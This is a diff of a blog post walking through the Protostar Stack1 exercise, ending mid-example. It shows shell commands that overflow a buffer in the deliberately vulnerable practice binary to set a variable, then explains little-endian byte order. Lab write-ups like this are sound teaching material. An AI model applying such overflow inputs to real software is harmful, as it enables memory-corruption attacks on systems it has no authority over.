kevinalmansa/kevinalmansa.github.io/_posts/2017-7-23-Protostar-Stack-Write-up.md

 input is passed via a program parameter.

 Last time, we overflowed 'A' into modified, making the value 0x000041.
-This time let's try overflowing 4 value, 0x61, 0x62, 0x63, and 0x64.
+This time let's try overflowing 4 values; 0x61, 0x62, 0x63, and 0x64.

 ```
 user@protostar:/opt/protostar/bin$ ./stack1 $(python -c "print 'A' * 64 + '\x61\x62\x63\x64'")
 Try again, you got 0x64636261
 ```

+> Note:
-In python we can specify a byte value in a string with '\x' followed by the hex value we want.
+> In python we can specify a byte value in a string with '\x' followed by the hex
+> value we want.

-The value for modified this time was 0x64636261 when we entered 0x61626364.
+The value for ```modified``` this time was 0x64636261 when we entered 0x61626364.
 This is because the machine is **little endian** meaning you store the *least* *significant* byte in the smallest address.
 This can be visualized by this challenge as follows:

 ```sh
 user@protostar:/opt/protostar/bin$ ./stack1 $(python -c "print 'A' * 64 + '\x64'")